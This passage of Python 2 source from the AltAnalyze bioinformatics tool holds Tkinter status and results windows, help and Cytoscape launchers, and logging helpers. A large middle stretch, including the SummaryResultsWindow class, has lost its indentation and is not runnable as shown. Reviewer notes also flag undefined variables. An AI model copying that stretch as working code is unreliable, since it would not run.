            print_out = 'AltAnalyze was unable to find an expression dataset to analyze in:\n',import_dir,'\nor\n',import_dir2,'\nPlease re-run and select a valid input directory.'
            try: UI.WarningWindow(print_out,'Exit'); print print_out
            except Exception: print print_out
            badExit()
    else:
        try: clearObjectsFromMemory(exon_db); clearObjectsFromMemory(constitutive_probeset_db); constitutive_probeset_db=[]
        except Exception: null=[]
        try: clearObjectsFromMemory(last_exon_region_db);last_exon_region_db=[]
        except Exception: null=[]
        return None
def filterAltExpressionFiles(dir_list,current_files):
    """Restrict dir_list to the filenames present in current_files.

    An empty current_files means "no restriction" and dir_list is returned
    unchanged. Any unexpected error (e.g. current_files is None) also
    leaves dir_list as-is - deliberately defensive for batch runs.
    """
    try:
        if len(current_files) == 0: current_files = dir_list ###if no filenames input
        dir_list = [filename for filename in dir_list if filename in current_files]
    except Exception:
        pass ### keep the original dir_list on any failure
    return dir_list
def defineEmptyExpressionVars(exon_db):
    """Initialize the module-level expression databases with empty defaults.

    Used in annotate-only mode (no expression import): every probeset in
    exon_db receives an empty ('','') fold entry so downstream code can
    index fold_dbase without KeyErrors.
    NOTE: original_fold_dbase is an alias of fold_dbase (same dict object).
    """
    global fold_dbase; fold_dbase={}; global original_fold_dbase; global critical_exon_db; critical_exon_db={}
    global midas_db; midas_db = {}; global max_replicates; global equal_replicates; max_replicates=0; equal_replicates=0
    for probeset in exon_db: fold_dbase[probeset]='',''
    original_fold_dbase = fold_dbase
def universalPrintFunction(print_items):
    """Write each item in print_items to the run log, or print in CLI mode.

    In command-line mode the Logger wrapper already captures stdout, so
    items are printed rather than written to the (still opened) log file.
    NOTE(review): log_file and commandLineMode are module-level globals.
    """
    log_report = open(log_file,'a')
    for item in print_items:
        if commandLineMode == 'no': ### Command-line has it's own log file write method (Logger)
            log_report.write(item+'\n')
        else: print item
    log_report.close()
class StatusWindow:
    """Tkinter window that streams AltAnalyze progress output while running.

    Redirects sys.stdout into a scrolled label (via StringVarFile) and then
    launches AltAnalyzeMain. Requires the Tkinter/PmwFreeze names imported
    at module level.
    """
    def __init__(self,root,expr_var,alt_var,goelite_var,additional_var,exp_file_location_db):
        root.title('AltAnalyze version 2.1.3')
        statusVar = StringVar() ### Class method for Tkinter. Description: "Value holder for strings variables."
        self.root = root
        height = 450; width = 500
        if os.name != 'nt': height = 500; width = 600 ### larger window on Mac/Linux
        self.sf = PmwFreeze.ScrolledFrame(root,
                labelpos = 'n', label_text = 'Results Status Window',
                usehullsize = 1, hull_width = width, hull_height = height)
        self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
        self.frame = self.sf.interior()
        group = PmwFreeze.Group(self.sf.interior(),tag_text = 'Output')
        group.pack(fill = 'both', expand = 1, padx = 10, pady = 0)
        Label(group.interior(),width=190,height=1000,justify=LEFT, bg='black', fg = 'white',anchor=NW,padx = 5,pady = 5, textvariable=statusVar).pack(fill=X,expand=Y)
        status = StringVarFile(statusVar,root) ### Likely captures the stdout
        sys.stdout = status
        for dataset in exp_file_location_db:
            fl = exp_file_location_db[dataset]; fl.setSTDOUT(sys.stdout)
        ### Kick off the analysis once the window is up
        root.after(100, AltAnalyzeMain(expr_var, alt_var, goelite_var, additional_var, exp_file_location_db, root))
        try:
            root.protocol("WM_DELETE_WINDOW", self.deleteWindow)
            root.mainloop()
        except Exception: pass
    def deleteWindow(self):
        ### Close the window without exiting the process
        try: self.root.destroy()
        except Exception: pass
    def quit(self):
        ### Tear down the window, then exit the whole application
        try:
            self.root.quit()
            self.root.destroy()
        except Exception: pass
        sys.exit()
def exportComparisonSummary(dataset_name,summary_data_dbase,return_type):
    """Format the per-comparison summary statistics for log or display.

    dataset_name: comparison name (trailing '-' stripped for display).
    summary_data_dbase: dict of summary counters; the 'QC' key holds a list
    of graphic links and is left untouched, all other values are stringified.
    return_type: 'log' writes the lines to the run log; 'print' (or any
    other value) only returns them.
    Returns the formatted lines as a list of strings.
    NOTE(review): depends on module globals log_file, explicit_data_type
    and array_type.
    """
    log_report = open(log_file,'a')
    result_list=[]
    for key in summary_data_dbase:
        if key != 'QC': ### The value is a list of strings
            summary_data_dbase[key] = str(summary_data_dbase[key])
    d = 'Dataset name: '+ dataset_name[:-1]; result_list.append(d+'\n')
    try:
        d = summary_data_dbase['gene_assayed']+':\tAll genes examined'; result_list.append(d)
        d = summary_data_dbase['denominator_exp_genes']+':\tExpressed genes examined for AS'; result_list.append(d)
        ### Event wording depends on the platform / analysis mode
        if explicit_data_type == 'exon-only':
            d = summary_data_dbase['alt_events']+':\tAlternatively regulated probesets'; result_list.append(d)
            d = summary_data_dbase['denominator_exp_events']+':\tExpressed probesets examined'; result_list.append(d)
        elif (array_type == 'AltMouse' or array_type == 'junction' or array_type == 'RNASeq') and (explicit_data_type == 'null' or return_type == 'print'):
            d = summary_data_dbase['alt_events']+':\tAlternatively regulated junction-pairs'; result_list.append(d)
            d = summary_data_dbase['denominator_exp_events']+':\tExpressed junction-pairs examined'; result_list.append(d)
        else:
            d = summary_data_dbase['alt_events']+':\tAlternatively regulated probesets'; result_list.append(d)
            d = summary_data_dbase['denominator_exp_events']+':\tExpressed probesets examined'; result_list.append(d)
        d = summary_data_dbase['alt_genes']+':\tAlternatively regulated genes (ARGs)'; result_list.append(d)
        d = summary_data_dbase['direct_domain_genes']+':\tARGs - overlaping with domain/motifs'; result_list.append(d)
        d = summary_data_dbase['miRNA_gene_hits']+':\tARGs - overlaping with microRNA binding sites'; result_list.append(d)
    except Exception:
        pass
    result_list2=[]
    ### Normalize terminology for the platform ('probeset' -> 'exon'/'junction')
    for d in result_list:
        if explicit_data_type == 'exon-only': d = string.replace(d,'probeset','exon')
        elif array_type == 'RNASeq': d = string.replace(d,'probeset','junction')
        result_list2.append(d)
    result_list = result_list2
    if return_type == 'log':
        for d in result_list: log_report.write(d+'\n')
        log_report.write('\n')
    log_report.close()
    return result_list
class SummaryResultsWindow:
def __init__(self,tl,analysis_type,output_dir,dataset_name,output_type,summary_data_dbase):
def showLink(event):
try:
idx = int(event.widget.tag_names(CURRENT)[1]) ### This is just the index provided below (e.g., str(0))
#print [self.LINKS[idx]]
if 'http://' in self.LINKS[idx]:
webbrowser.open(self.LINKS[idx])
elif self.LINKS[idx][-1] == '/':
self.openSuppliedDirectory(self.LINKS[idx])
else:
### Instead of using this option to open a hyperlink (which is what it should do), we can open another Tk window
try: self.viewPNGFile(self.LINKS[idx]) ### ImageTK PNG viewer
except Exception:
try: self.ShowImageMPL(self.LINKS[idx]) ### MatPlotLib based dispaly
except Exception:
self.openPNGImage(self.LINKS[idx]) ### Native OS PNG viewer
#self.DisplayPlots(self.LINKS[idx]) ### GIF based display
except Exception:
null=[] ### anomalous error
self.emergency_exit = False
self.LINKS = []
self.tl = tl
self.tl.title('AltAnalyze version 2.1.3')
self.analysis_type = analysis_type
filename = 'Config/icon.gif'
fn=filepath(filename); img = PhotoImage(file=fn)
can = Canvas(tl); can.pack(side='top'); can.config(width=img.width(), height=img.height())
can.create_image(2, 2, image=img, anchor=NW)
use_scroll = 'yes'
try: runGOElite = run_GOElite
except Exception: runGOElite='decide_later'
if 'QC' in summary_data_dbase:
graphic_links = summary_data_dbase['QC'] ### contains hyperlinks to QC and Clustering plots
if len(graphic_links)==0: del summary_data_dbase['QC'] ### This can be added if an analysis fails
else:
graphic_links = []
label_text_str = 'AltAnalyze Result Summary'; height = 150; width = 500
if analysis_type == 'AS' or 'QC' in summary_data_dbase: height = 330
if analysis_type == 'AS' and 'QC' in summary_data_dbase: height = 330
self.sf = PmwFreeze.ScrolledFrame(tl,
labelpos = 'n', label_text = label_text_str,
usehullsize = 1, hull_width = width, hull_height = height)
self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
self.frame = self.sf.interior()
txt=Text(self.frame,bg='light gray',width=150, height=80)
txt.pack(expand=True, fill="both")
#txt.insert(END, 'Primary Analysis Finished....\n')
txt.insert(END, 'Results saved to:\n'+output_dir+'\n')
f = Font(family="System", size=12, weight="bold")
txt.tag_config("font", font=f)
i=0
copyDirectoryPDFs(output_dir,AS=analysis_type)
if analysis_type == 'AS':
txt.insert(END, '\n')
result_list = exportComparisonSummary(dataset_name,summary_data_dbase,'print')
for d in result_list: txt.insert(END, d+'\n')
if 'QC' in summary_data_dbase and len(graphic_links)>0:
txt.insert(END, '\nQC and Expression Clustering Plots',"font")
txt.insert(END, '\n\n 1) ')
for (name,file_dir) in graphic_links:
txt.insert(END, name, ('link', str(i)))
if len(graphic_links) > (i+1):
txt.insert(END, '\n %s) ' % str(i+2))
self.LINKS.append(file_dir)
i+=1
txt.insert(END, '\n\nView all primary plots in the folder ')
txt.insert(END, 'DataPlots',('link', str(i))); i+=1
self.LINKS.append(output_dir+'DataPlots/')
else:
url = 'http://altanalyze.readthedocs.io/en/latest/'
self.LINKS=(url,'')
txt.insert(END, '\nFor more information see the ')
txt.insert(END, "AltAnalyze Online Help", ('link', str(0)))
txt.insert(END, '\n\n')
if runGOElite == 'run-immediately':
txt.insert(END, '\n\nView all pathway enrichment results in the folder ')
txt.insert(END, 'GO-Elite',('link', str(i))); i+=1
self.LINKS.append(output_dir+'GO-Elite/')
if analysis_type == 'AS':
txt.insert(END, '\n\nView all splicing plots in the folder ')
txt.insert(END, 'ExonPlots',('link', str(i))); i+=1
try: self.LINKS.append(output_dir+'ExonPlots/')
except Exception: pass
txt.tag_config('link', foreground="blue", underline = 1)
txt.tag_bind('link', '<Button-1>', showLink)
txt.insert(END, '\n\n')
open_results_folder = Button(tl, text = 'Results Folder', command = self.openDirectory)
open_results_folder.pack(side = 'left', padx = 5, pady = 5);
if analysis_type == 'AS':
#self.dg_url = 'http://www.altanalyze.org/domaingraph.htm'
self.dg_url = 'http://www.altanalyze.org/domaingraph.htm'
dg_pdf_file = 'Documentation/domain_graph.pdf'; dg_pdf_file = filepath(dg_pdf_file); self.dg_pdf_file = dg_pdf_file
text_button = Button(tl, text='Start DomainGraph in Cytoscape', command=self.SelectCytoscapeTopLevel)
text_button.pack(side = 'right', padx = 5, pady = 5)
self.output_dir = output_dir + "AltResults"
self.whatNext_url = 'http://altanalyze.readthedocs.io/en/latest/' #http://www.altanalyze.org/what_next_altexon.htm'
whatNext_pdf = 'Documentation/what_next_alt_exon.pdf'; whatNext_pdf = filepath(whatNext_pdf); self.whatNext_pdf = whatNext_pdf
if output_type == 'parent': self.output_dir = output_dir ###Used for fake datasets
else:
if pathway_permutations == 'NA':
self.output_dir = output_dir + "ExpressionOutput"
else: self.output_dir = output_dir
self.whatNext_url = 'http://altanalyze.readthedocs.io/en/latest/' #'http://www.altanalyze.org/what_next_expression.htm'
whatNext_pdf = 'Documentation/what_next_GE.pdf'; whatNext_pdf = filepath(whatNext_pdf); self.whatNext_pdf = whatNext_pdf
what_next = Button(tl, text='What Next?', command=self.whatNextlinkout)
what_next.pack(side = 'right', padx = 5, pady = 5)
quit_buttonTL = Button(tl,text='Close View', command=self.close)
quit_buttonTL.pack(side = 'right', padx = 5, pady = 5)
continue_to_next_win = Button(text = 'Continue', command = self.continue_win)
continue_to_next_win.pack(side = 'right', padx = 10, pady = 10)
quit_button = Button(root,text='Quit', command=self.quit)
quit_button.pack(side = 'right', padx = 5, pady = 5)
button_text = 'Help'; help_url = 'http://www.altanalyze.org/help_main.htm'; self.help_url = filepath(help_url)
pdf_help_file = 'Documentation/AltAnalyze-Manual.pdf'; pdf_help_file = filepath(pdf_help_file); self.pdf_help_file = pdf_help_file
help_button = Button(root, text=button_text, command=self.Helplinkout)
help_button.pack(side = 'left', padx = 5, pady = 5)
if self.emergency_exit == False:
self.tl.protocol("WM_DELETE_WINDOW", self.tldeleteWindow)
self.tl.mainloop() ###Needed to show graphic
else:
""" This shouldn't have to be called, but is when the topLevel window isn't closed first
specifically if a PNG file is opened. the sys.exitfunc() should work but doesn't.
work on this more later """
#AltAnalyzeSetup('no')
try: self._tls.quit(); self._tls.destroy()
except Exception: None
try: self._tlx.quit(); self._tlx.destroy()
except Exception: None
try: self._tlx.quit(); self._tlx.destroy()
except Exception: None
try: self.tl.quit(); self.tl.destroy()
except Exception: None
try: root.quit(); root.destroy()
except Exception: None
UI.getUpdatedParameters(array_type,species,'Process Expression file',output_dir)
sys.exit() ### required when opening PNG files on Windows to continue (not sure why)
#sys.exitfunc()
def tldeleteWindow(self):
try: self.tl.quit(); self.tl.destroy()
except Exception: self.tl.destroy()
def deleteTLWindow(self):
self.emergency_exit = True
try: self._tls.quit(); self._tls.destroy()
except Exception: None
try: self._tlx.quit(); self._tlx.destroy()
except Exception: None
self.tl.quit()
self.tl.destroy()
sys.exitfunc()
def deleteWindow(self):
self.emergency_exit = True
try: self._tls.quit(); self._tls.destroy()
except Exception: None
try: self._tlx.quit(); self._tlx.destroy()
except Exception: None
try:
self.tl.quit()
self.tl.destroy()
except Exception: None
sys.exitfunc()
    def continue_win(self):
        """'Continue' button handler: tear down every open window (plot,
        image and results TopLevels, then the Tk root) and run the
        registered exit handler so a fresh analysis round can start."""
        self.emergency_exit = True
        # Best-effort teardown of the auxiliary windows first.
        try: self._tls.quit(); self._tls.destroy()
        except Exception: None
        try: self._tlx.quit(); self._tlx.destroy()
        except Exception: None
        try: self.tl.quit(); self.tl.destroy()
        except Exception: pass
        root.quit()
        root.destroy()
        # grid_forget on already-destroyed widgets raises; ignored on purpose.
        try: self.tl.grid_forget()
        except Exception: None
        try: root.grid_forget()
        except Exception: None
        # Python 2 only: run the handler registered via sys.exitfunc/atexit.
        sys.exitfunc()
def openDirectory(self):
if runningCommandLine:
pass
elif os.name == 'nt':
try: os.startfile('"'+self.output_dir+'"')
except Exception: os.system('open "'+self.output_dir+'"')
elif 'darwin' in sys.platform: os.system('open "'+self.output_dir+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+self.output_dir+'/"')
def openSuppliedDirectory(self,dir):
if runningCommandLine:
pass
elif os.name == 'nt':
try: os.startfile('"'+self.output_dir+'"')
except Exception: os.system('open "'+dir+'"')
elif 'darwin' in sys.platform: os.system('open "'+dir+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+dir+'/"')
    def DGlinkout(self):
        """Launch the bundled Cytoscape for DomainGraph, clear any stored
        custom Cytoscape location, and show the DomainGraph help chooser."""
        try:
            altanalyze_path = filepath('') ### Find AltAnalye's path
            altanalyze_path = altanalyze_path[:-1]
        except Exception: null=[]
        # Pick the conventional install location per platform.
        # NOTE(review): on an unmatched platform these names stay unbound and
        # the openCytoscape call below fails silently via its except.
        if os.name == 'nt':
            parent_dir = 'C:/Program Files'; application_dir = 'Cytoscape_v'; application_name = 'Cytoscape.exe'
        elif 'darwin' in sys.platform:
            parent_dir = '/Applications'; application_dir = 'Cytoscape_v'; application_name = 'Cytoscape.app'
        elif 'linux' in sys.platform:
            parent_dir = '/opt'; application_dir = 'Cytoscape_v'; application_name = 'Cytoscape'
        try: openCytoscape(altanalyze_path,application_dir,application_name)
        except Exception: null=[]
        try: self._tls.destroy()
        except Exception: None
        try: ###Remove this cytoscape as the default
            file_location_defaults = UI.importDefaultFileLocations()
            del file_location_defaults['CytoscapeDir']
            UI.exportDefaultFileLocations(file_location_defaults)
        except Exception: null=[]
        self.GetHelpTopLevel(self.dg_url,self.dg_pdf_file)
def Helplinkout(self): self.GetHelpTopLevel(self.help_url,self.pdf_help_file)
def whatNextlinkout(self): self.GetHelpTopLevel(self.whatNext_url,self.whatNext_pdf)
def ShowImageMPL(self,file_location):
""" Visualization method using MatPlotLib """
try:
import matplotlib
import matplotlib.pyplot as pylab
except Exception:
#print 'Graphical output mode disabled (requires matplotlib, numpy and scipy)'
None
fig = pylab.figure()
pylab.subplots_adjust(left=0.0, right=1.0, top=1.0, bottom=0.00) ### Fill the plot area left to right
ax = fig.add_subplot(111)
ax.set_xticks([]) ### Hides ticks
ax.set_yticks([])
img= pylab.imread(file_location)
imgplot = pylab.imshow(img)
pylab.show()
def viewPNGFile(self,png_file_dir):
""" View PNG file within a PMW Tkinter frame """
try: import ImageTk
except Exception:
from PIL import ImageTk
from PIL import Image
tlx = Toplevel(); self._tlx = tlx
sf = PmwFreeze.ScrolledFrame(tlx, labelpos = 'n', label_text = '',
usehullsize = 1, hull_width = 800, hull_height = 550)
sf.pack(padx = 0, pady = 0, fill = 'both', expand = 1)
frame = sf.interior()
tlx.title(png_file_dir)
img = ImageTk.PhotoImage(file=png_file_dir)
can = Canvas(frame)
can.pack(fill=BOTH, padx = 0, pady = 0)
w = img.width()
h = height=img.height()
can.config(width=w, height=h)
can.create_image(2, 2, image=img, anchor=NW)
tlx.mainloop()
def openPNGImage(self,png_file_dir):
if runningCommandLine:
pass
elif os.name == 'nt':
try: os.startfile('"'+png_file_dir+'"')
except Exception: os.system('open "'+png_file_dir+'"')
elif 'darwin' in sys.platform: os.system('open "'+png_file_dir+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+png_file_dir+'"')
    def DisplayPlots(self,file_location):
        """ Native Tkinter method - Displays a gif file in a standard TopLevel window (nothing fancy) """
        tls = Toplevel(); self._tls = tls; nulls = '\t\t\t\t'; tls.title('AltAnalyze Plot Visualization')
        # Scrollable container so images larger than the hull remain reachable.
        self.sf = PmwFreeze.ScrolledFrame(self._tls,
                labelpos = 'n', label_text = '', usehullsize = 1, hull_width = 520, hull_height = 500)
        self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
        self.frame = self.sf.interior()
        # Group header shows the file path being displayed.
        group = PmwFreeze.Group(self.sf.interior(),tag_text = file_location)
        group.pack(fill = 'both', expand = 1, padx = 10, pady = 0)
        img = PhotoImage(file=filepath(file_location))
        # Size the canvas to the image so it is shown at native resolution.
        can = Canvas(group.interior()); can.pack(side='left',padx = 10, pady = 20); can.config(width=img.width(), height=img.height())
        can.create_image(2, 2, image=img, anchor=NW)
        tls.mainloop()
def GetHelpTopLevel(self,url,pdf_file):
try:
config_db = UI.importConfigFile()
ask_for_help = config_db['help'] ### hide_selection_option
except Exception: ask_for_help = 'null'; config_db={}
self.pdf_file = pdf_file; self.url = url
if ask_for_help == 'null':
message = ''; self.message = message; self.online_help = 'Online Documentation'; self.pdf_help = 'Local PDF File'
tls = Toplevel(); self._tls = tls; nulls = '\t\t\t\t'; tls.title('Please select one of the options')
self.sf = PmwFreeze.ScrolledFrame(self._tls,
labelpos = 'n', label_text = '', usehullsize = 1, hull_width = 320, hull_height = 200)
self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
self.frame = self.sf.interior()
group = PmwFreeze.Group(self.sf.interior(),tag_text = 'Options')
group.pack(fill = 'both', expand = 1, padx = 10, pady = 0)
filename = 'Config/icon.gif'; fn=filepath(filename); img = PhotoImage(file=fn)
can = Canvas(group.interior()); can.pack(side='left',padx = 10, pady = 20); can.config(width=img.width(), height=img.height())
can.create_image(2, 2, image=img, anchor=NW)
l1 = Label(group.interior(), text=nulls); l1.pack(side = 'bottom')
text_button2 = Button(group.interior(), text=self.online_help, command=self.openOnlineHelp); text_button2.pack(side = 'top', padx = 5, pady = 5)
try: text_button = Button(group.interior(), text=self.pdf_help, command=self.openPDFHelp); text_button.pack(side = 'top', padx = 5, pady = 5)
except Exception: text_button = Button(group.interior(), text=self.pdf_help, command=self.openPDFHelp); text_button.pack(side = 'top', padx = 5, pady = 5)
text_button3 = Button(group.interior(), text='No Thanks', command=self.skipHelp); text_button3.pack(side = 'top', padx = 5, pady = 5)
c = Checkbutton(group.interior(), text = "Apply these settings each time", command=self.setHelpConfig); c.pack(side = 'bottom', padx = 5, pady = 0)
tls.mainloop()
try: tls.destroy()
except Exception: None
else:
file_location_defaults = UI.importDefaultFileLocations()
try:
help_choice = file_location_defaults['HelpChoice'].Location()
if help_choice == 'PDF': self.openPDFHelp()
elif help_choice == 'http': self.openOnlineHelp()
else: self.skip()
except Exception: self.openPDFHelp() ### Open PDF if there's a problem
    def SelectCytoscapeTopLevel(self):
        """Ask whether to launch the bundled or a previously installed
        Cytoscape, or honor a stored preference and launch directly."""
        try:
            config_db = UI.importConfigFile()
            cytoscape_type = config_db['cytoscape'] ### hide_selection_option
        except Exception: cytoscape_type = 'null'; config_db={}
        if cytoscape_type == 'null':
            # No stored preference: show the chooser window.
            message = ''; self.message = message
            tls = Toplevel(); self._tls = tls; nulls = '\t\t\t\t'; tls.title('Cytoscape Automatic Start Options')
            self.sf = PmwFreeze.ScrolledFrame(self._tls,
                    labelpos = 'n', label_text = '', usehullsize = 1, hull_width = 420, hull_height = 200)
            self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
            self.frame = self.sf.interior()
            group = PmwFreeze.Group(self.sf.interior(),tag_text = 'Options')
            group.pack(fill = 'both', expand = 1, padx = 10, pady = 0)
            filename = 'Config/cyto-logo-smaller.gif'; fn=filepath(filename); img = PhotoImage(file=fn)
            can = Canvas(group.interior()); can.pack(side='left',padx = 10, pady = 5); can.config(width=img.width(), height=img.height())
            can.create_image(2, 2, image=img, anchor=NW)
            #"""
            self.local_cytoscape = 'AltAnalyze Bundled Version'; self.custom_cytoscape = 'Previously Installed Version'
            l1 = Label(group.interior(), text=nulls); l1.pack(side = 'bottom')
            l3 = Label(group.interior(), text='Select version of Cytoscape to open:'); l3.pack(side = 'top', pady = 5)
            """
            self.local_cytoscape = ' No '; self.custom_cytoscape = ' Yes '
            l1 = Label(group.interior(), text=nulls); l1.pack(side = 'bottom')
            l2 = Label(group.interior(), text='Note: Cytoscape can take up-to a minute to initalize', fg="red"); l2.pack(side = 'top', padx = 5, pady = 0)
            """
            text_button2 = Button(group.interior(), text=self.local_cytoscape, command=self.DGlinkout); text_button2.pack(padx = 5, pady = 5)
            # NOTE(review): the except body duplicates the try body exactly
            # (a one-shot retry); likely a copy/paste leftover.
            try: text_button = Button(group.interior(), text=self.custom_cytoscape, command=self.getPath); text_button.pack(padx = 5, pady = 5)
            except Exception: text_button = Button(group.interior(), text=self.custom_cytoscape, command=self.getPath); text_button.pack(padx = 5, pady = 5)
            l2 = Label(group.interior(), text='Note: Cytoscape can take up-to a minute to initalize', fg="blue"); l2.pack(side = 'bottom', padx = 5, pady = 0)
            c = Checkbutton(group.interior(), text = "Apply these settings each time and don't show again", command=self.setCytoscapeConfig); c.pack(side = 'bottom', padx = 5, pady = 0)
            #c2 = Checkbutton(group.interior(), text = "Open PDF of DomainGraph help rather than online help", command=self.setCytoscapeConfig); c2.pack(side = 'bottom', padx = 5, pady = 0)
            tls.mainloop()
            try: tls.destroy()
            except Exception: None
        else:
            # Preference stored: open the remembered install, falling back
            # to the bundled copy if that fails.
            file_location_defaults = UI.importDefaultFileLocations()
            try: cytoscape_app_dir = file_location_defaults['CytoscapeDir'].Location(); openFile(cytoscape_app_dir)
            except Exception:
                try: altanalyze_path = filepath(''); altanalyze_path = altanalyze_path[:-1]
                except Exception: altanalyze_path=''
                application_dir = 'Cytoscape_v'
                if os.name == 'nt': application_name = 'Cytoscape.exe'
                elif 'darwin' in sys.platform: application_name = 'Cytoscape.app'
                elif 'linux' in sys.platform: application_name = 'Cytoscape'
                try: openCytoscape(altanalyze_path,application_dir,application_name)
                except Exception: null=[]
def setCytoscapeConfig(self):
config_db={}; config_db['cytoscape'] = 'hide_selection_option'
UI.exportConfigFile(config_db)
def setHelpConfig(self):
config_db={}; config_db['help'] = 'hide_selection_option'
UI.exportConfigFile(config_db)
    def getPath(self):
        """Prompt for a user-installed Cytoscape directory, launch it,
        remember it as the default, and show the DomainGraph help chooser."""
        file_location_defaults = UI.importDefaultFileLocations()
        # Conventional install roots per platform (used only to seed the
        # directory-picker when no default is stored).
        if os.name == 'nt': parent_dir = 'C:/Program Files'; application_dir = 'Cytoscape_v'; application_name = 'Cytoscape.exe'
        elif 'darwin' in sys.platform: parent_dir = '/Applications'; application_dir = 'Cytoscape_v'; application_name = 'Cytoscape.app'
        elif 'linux' in sys.platform: parent_dir = '/opt'; application_dir = 'Cytoscape_v'; application_name = 'Cytoscape'
        try:
            # Start the picker one level above the stored executable path.
            self.default_dir = file_location_defaults['CytoscapeDir'].Location()
            self.default_dir = string.replace(self.default_dir,'//','/')
            self.default_dir = string.replace(self.default_dir,'\\','/')
            self.default_dir = string.join(string.split(self.default_dir,'/')[:-1],'/')
        except Exception:
            dir = FindDir(parent_dir,application_dir); dir = filepath(parent_dir+'/'+dir)
            self.default_dir = filepath(parent_dir)
        # Progressively relax the dialog arguments until one succeeds.
        try: dirPath = tkFileDialog.askdirectory(parent=self._tls,initialdir=self.default_dir)
        except Exception:
            self.default_dir = ''
            try: dirPath = tkFileDialog.askdirectory(parent=self._tls,initialdir=self.default_dir)
            except Exception:
                try: dirPath = tkFileDialog.askdirectory(parent=self._tls)
                except Exception: dirPath=''
        try:
            #print [dirPath],application_name
            app_dir = dirPath+'/'+application_name
            if 'linux' in sys.platform:
                # NOTE(review): cytoscape_dir is never defined here, so this
                # always raises NameError and is silently skipped — confirm
                # intended variable (dirPath?).
                try: createCytoscapeDesktop(cytoscape_dir)
                except Exception: null=[]
                dir_list = unique.read_directory('/usr/bin/') ### Check to see that JAVA is installed
                if 'java' not in dir_list: print 'Java not referenced in "usr/bin/. If not installed,\nplease install and re-try opening Cytoscape'
                try:
                    # Launch the jar directly in the background via the JVM.
                    jar_path = dirPath+'/cytoscape.jar'
                    main_path = dirPath+'/cytoscape.CyMain'
                    plugins_path = dirPath+'/plugins'
                    os.system('java -Dswing.aatext=true -Xss5M -Xmx512M -jar '+jar_path+' '+main_path+' -p '+plugins_path+' &')
                    print 'Cytoscape jar opened:',jar_path
                except Exception:
                    print 'OS command to open Java failed.'
                    # NOTE(review): app_dir2 is undefined (NameError), so this
                    # always falls through to openFile(app_dir) — confirm.
                    try: openFile(app_dir2); print 'Cytoscape opened:',app_dir2
                    except Exception: openFile(app_dir)
            else: openFile(app_dir)
            # Remember the selection as the new default location.
            try: file_location_defaults['CytoscapeDir'].SetLocation(app_dir)
            except Exception:
                fl = UI.FileLocationData('', app_dir, 'all')
                file_location_defaults['CytoscapeDir'] = fl
            UI.exportDefaultFileLocations(file_location_defaults)
        except Exception: null=[]
        try: self._tls.destroy()
        except Exception: None
        self.GetHelpTopLevel(self.dg_url,self.dg_pdf_file)
def openOnlineHelp(self):
file_location_defaults = UI.importDefaultFileLocations()
try:file_location_defaults['HelpChoice'].SetLocation('http')
except Exception:
fl = UI.FileLocationData('', 'http', 'all')
file_location_defaults['HelpChoice'] = fl
UI.exportDefaultFileLocations(file_location_defaults)
webbrowser.open(self.url)
#except Exception: null=[]
try: self._tls.destroy()
except Exception: None
def skipHelp(self):
file_location_defaults = UI.importDefaultFileLocations()
try: file_location_defaults['HelpChoice'].SetLocation('skip')
except Exception:
fl = UI.FileLocationData('', 'skip', 'all')
file_location_defaults['HelpChoice'] = fl
UI.exportDefaultFileLocations(file_location_defaults)
try: self._tls.destroy()
except Exception: None
def openPDFHelp(self):
file_location_defaults = UI.importDefaultFileLocations()
try:file_location_defaults['HelpChoice'].SetLocation('PDF')
except Exception:
fl = UI.FileLocationData('', 'PDF', 'all')
file_location_defaults['HelpChoice'] = fl
UI.exportDefaultFileLocations(file_location_defaults)
if runningCommandLine:
pass
elif os.name == 'nt':
try: os.startfile('"'+self.pdf_file+'"')
except Exception: os.system('open "'+self.pdf_file+'"')
elif 'darwin' in sys.platform: os.system('open "'+self.pdf_file+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+self.pdf_file+'"')
try: self._tls.destroy()
except Exception: None
def quit(self):
root.quit()
root.destroy()
sys.exit()
def close(self):
#self.tl.quit() #### This was causing multiple errors in 2.0.7 - evaluate more!
self.tl.destroy()
class StringVarFile:
    """File-like object bound to a Tk StringVar: assigned to sys.stdout so
    every print statement is appended to the module-global log file and
    mirrored into the status window's StringVar."""
    def __init__(self,stringVar,window):
        # __newline flags that the displayed text should be reset before the
        # next character is appended (see the '\k' note in write()).
        self.__newline = 0; self.__stringvar = stringVar; self.__window = window
    def write(self,s):
        """Append s to the log file and to the on-screen status text;
        any failure (e.g. log_file unset) is deliberately swallowed."""
        try:
            log_report = open(log_file,'a')
            log_report.write(s); log_report.close() ### Variable to record each print statement
            new = self.__stringvar.get()
            for c in s:
                #if c == '\n': self.__newline = 1
                if c == '\k': self.__newline = 1### This should not be found and thus results in a continous feed rather than replacing a single line
                else:
                    if self.__newline: new = ""; self.__newline = 0
                    new = new+c
            self.set(new)
        except Exception: pass
    def set(self,s):
        """Push s into the StringVar and refresh the window immediately."""
        try: self.__stringvar.set(s); self.__window.update()
        except Exception: pass
    def get(self):
        """Return the current status text, or None if the widget is gone."""
        try:
            return self.__stringvar.get()
        except Exception: pass
    def flush(self):
        # Required by the file protocol; output is unbuffered, so a no-op.
        pass
def timestamp():
    """Return a "YYYYMMDD-HHMMSS" stamp (derived from the current date and
    time.ctime()) used to name the AltAnalyze log file."""
    import datetime
    today = str(datetime.date.today()); today = string.split(today,'-'); today = today[0]+''+today[1]+''+today[2]
    # Drop colons from ctime() so the time field becomes e.g. "140305".
    time_stamp = string.replace(time.ctime(),':','')
    # Collapse the double space ctime() emits before single-digit days so the
    # split below yields a stable field order.
    time_stamp = string.replace(time_stamp,'  ',' ')
    time_stamp = string.split(time_stamp,' ') ###Use a time-stamp as the output dir (minus the day)
    time_stamp = today+'-'+time_stamp[3]
    return time_stamp
def callWXPython():
    """Launch the wxPython-based AltAnalyze results viewer in-process."""
    import wx
    import AltAnalyzeViewer
    viewer_app = wx.App(False)
    AltAnalyzeViewer.remoteViewer(viewer_app)
def AltAnalyzeSetup(skip_intro):
    """Collect user parameters (via the UI), initialize module-global run
    state (paths, log file, statistics choice) and hand off either to the
    Tk status window or directly to AltAnalyzeMain.

    skip_intro -- UI flag; the special value 'remoteViewer' instead starts
    the standalone results-viewer application and exits.
